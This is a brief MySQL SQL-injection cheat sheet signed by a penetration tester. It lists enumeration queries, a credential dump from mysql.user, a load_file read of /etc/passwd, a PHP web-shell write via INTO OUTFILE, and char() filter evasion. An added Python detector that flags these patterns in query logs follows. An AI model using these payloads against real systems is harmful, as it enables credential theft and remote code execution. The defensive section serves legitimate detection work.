1. Common information:

SELECT @@version
SELECT user()
SELECT database()

2. Database name:

SELECT schema_name FROM information_schema.schemata

3. Table names:

SELECT table_name FROM information_schema.tables

4. Column names:

SELECT column_name FROM information_schema.columns

5. Dump data:

SELECT user,password FROM mysql.user

6. Reading files:

SELECT load_file('/etc/passwd')

7. Writing files:

SELECT '<?php system($_GET["c"]);?>' INTO OUTFILE '/tmp/test.php'
SELECT '<?php system($_GET["c"]);?>' INTO DUMPFILE '/tmp/test.php'

8. MySQL user:

SELECT user,password FROM mysql.user

9. Time Delay:


10. String tricks:

The same string "root" can be inserted as

char(114, 111, 111, 116)
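
For defenders reviewing query logs, the statements above can be matched after char() calls are decoded, since a plain keyword search for "root" misses the encoded form. This is an added example, not part of the original cheat sheet; the function names, signature names and watched literals are assumptions, and the log lines are constructed.

```python
import re

# Added example: names below are illustrative, not from any library.
# Signatures for the statement types listed on this page.
SIGNATURES = {
    "schema_enumeration": re.compile(r"\binformation_schema\.(schemata|tables|columns)\b", re.I),
    "credential_table_read": re.compile(r"\bmysql\.user\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I),
}
# Assumption: literals worth alerting on; both are taken from this page.
WATCHED_LITERALS = ("root", "/etc/passwd")
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)


def decode_char_calls(sql):
    """Rewrite char(114, 111, ...) as the quoted string it evaluates to."""
    def repl(match):
        codes = [int(n) for n in match.group(1).split(",")]
        if any(c > 255 for c in codes):
            return match.group(0)  # not single bytes, leave as written
        return "'" + "".join(chr(c) for c in codes) + "'"
    return CHAR_CALL.sub(repl, sql)


def classify(sql):
    """Return sorted finding names for one logged statement."""
    normalized = decode_char_calls(sql)
    hits = {name for name, rx in SIGNATURES.items() if rx.search(normalized)}
    if normalized != sql:
        hits.add("char_encoded_literal")
    lowered = normalized.lower()
    hits.update("watched_literal:" + lit for lit in WATCHED_LITERALS if lit in lowered)
    return sorted(hits)


# Constructed sample log lines, not captured from a real system.
SAMPLE_LOG = [
    "SELECT name FROM products WHERE id = 7",
    "SELECT * FROM accounts WHERE name = char(114, 111, 111, 116)",
    "SELECT 1 UNION SELECT table_name FROM information_schema.tables",
    "SELECT load_file(char(47,101,116,99,47,112,97,115,115,119,100))",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "<-", line)
```
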
Sanoj Kumar R

Red Teamer | Penetration Tester | OSCP